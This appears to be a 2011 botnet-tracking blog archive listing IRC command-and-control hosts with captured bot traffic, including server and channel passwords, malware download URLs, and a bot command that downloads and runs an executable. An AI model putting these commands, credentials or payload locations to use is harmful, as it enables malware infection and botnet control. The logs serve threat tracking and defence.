Month: May 2011

ng.grasshopperz11.com(ngr bot hosted in China Beijing Chinanet Jiangxi Province Network)

Uncategorized

DNS: ng.marketallone.com api.wipmania.com ng.themarketbaby.com ng.grasshopperz11.com Resolved : [ng.grasshopperz11.com] To [123.183.217.32] Resolved : [ng.grasshopperz11.com] To [60.190.218.104] Resolved : [ng.grasshopperz11.com] To [59.63.157.62] Resolved : [ng.grasshopperz11.com] To [59.53.91.167] Resolved : [ng.grasshopperz11.com] To [60.190.223.125] Resolved : [ng.marketallone.com] To [60.190.223.125] Resolved : [ng.marketallone.com] To [59.63.157.62] Resolved : [ng.marketallone.com] To [60.190.218.104] Resolved : [ng.marketallone.com] To [123.183.217.32] Resolved : [ng.marketallone.com] To [59.53.91.167]Read more...

65.75.118.255(irc botnet hosted in Bahamas Nassau Cable Bahamas Ltd)

Uncategorized

Remote Host Port Number 65.75.118.255 6667 USER soPSBDC47KHWcwuYTIVTwULhg8Msu7QbPef8Dja8Xt3rMvPBAkRtBrcrOj7gHNQ * * :gojMH85IxP3Molq JOIN #lobby USER bkqLycUpRpeCLWzJjgM * * :CG9IjLmh1q6GovTy7ZXg NICK UYeyOjxZgUqXQ PONG :5D8B0395 NICK kkvnH9rusO PONG :8020ECE6 USER l1iI4EoH4633GZO9DFuPsDD * * :QAKmwLIbxRK NICK k8rRRCahEHgwb5hP PONG :171C849A hosting infos: http://whois.domaintools.com/65.75.118.255

204.15.252.199(irc botnet hosted in United States Henderson Trashy Media)

Uncategorized

Remote Host Port Number 195.122.131.6 80 208.75.230.43 80 213.251.170.52 80 204.15.252.199 49287(ircd here) * The data identified by the following URLs was then requested from the remote web server: o http://rapidshare.com/files/936250907/lol.txt o http://www.freewebtown.com/nazmi/biz.exe o http://api.wipmania.com/ hosting infos: http://whois.domaintools.com/204.15.252.199

61.31.99.67(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)

Uncategorized

Remote Host Port Number 208.75.230.43 80 61.31.99.67 4042 NICK new[USA|XP|COMPUTERNAME]dyaamkn USER hh “” “lol” :hh JOIN #newbiz# PONG 422 NICK new[USA|XP|COMPUTERNAME]arfjwyo USER hh “” “lol” :hh JOIN #newgen# PONG 422 * The data identified by the following URL was then requested from the remote web server: o http://www.freewebtown.com/nazmi/ass.exe hosting infos: http://whois.domaintools.com/61.31.99.67

stolen.wshells.ws(irc botnet hosted in United States Morgantown Sharktech Internet Services)

Uncategorized

Remote Host Port Number stolen.wshells.ws 3211 PASS google_cache2.tmp NICK [DvLz-USA|XP]062652 USER 0626 “” “TsGh” :0626 JOIN #DvLz DvLz# NICK n[DvLz-USA|XP]737534 USER 4207 “” “TsGh” :4207 NICK [DvLz-USA|XP]976295 USER 9762 “” “TsGh” :9762 * The data identified by the following URL was then requested from the remote web server: o http://perfectteam.org/nosferatus/Crypter/taskhostt.exe hosting infos: http://whois.domaintools.com/208.98.26.140

72.20.30.22(irc botnet hosted in United States Staminus Communications)

Uncategorized

Remote Host Port Number 216.45.58.150 80 72.20.30.22 5900 PASS Virus NICK VirUs-sgpzxuis USER VirUs “” “usk” : 2DIE 3FUCKER. JOIN #B5# Virus PONG :TESTING.STUFF.HERE UPDATE: NICK VirUs-fxpjhnff USER VirUs “” “byy” : 8Coded 8Ahmed.Ramzey@Hotmail.Com.. JOIN #Rana1# Virus PONG :TESTING.STUFF.HERE hosting infos: http://whois.domaintools.com/72.20.30.22

irc.chimon.us(botnet hosted in Netherlands Amsterdam Denkers Ict – Ipv4 Infrastructure)

Uncategorized

Resolved : [irc.chimon.us] To [46.21.169.42] Resolved : [irc.chimon.us] To [67.202.109.136] 46.21.169.42:6567 Nick: [SI|AUT|00|P|40016] Username: XP-6988 Server Pass: s1m0n3t4 Joined Channel: #sev# with Password c1rc0dusoleil Channel Topic for Channel #sev#: “.desfi http://img103.herosh.com/2011/05/17/385482491.gif c:WINDOWSwindi.exe 1” Private Message to Channel #sev#: “[Dl]: Created process: “c:WINDOWSwindi.exe”, PID: “ Private Message to Channel #sev#: “[Dl]: File download: 80.0KB to: c:WINDOWSwindi.exeRead more...

ngme.drwhox.com(irc botnet hosted in China Hebei Chinanet Hebei Province Network)

Uncategorized

Remote Host Port Number ngme.drwhox.com:5101 possible dns : ngme.yourwebfind.com 123.183.217.32 5101 PASS hax0r(ircd here) 213.251.170.52 80 31.184.237.43 80 60.190.223.125 6943 PASS laorosr(ircd here) PRIVMSG #on :[d=”http://31.184.237.43/0481.exe” s=”60779 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 MODE [N00_USA_XP_1567294] @ -ix * The data identified by the following URLs was then requested from theRead more...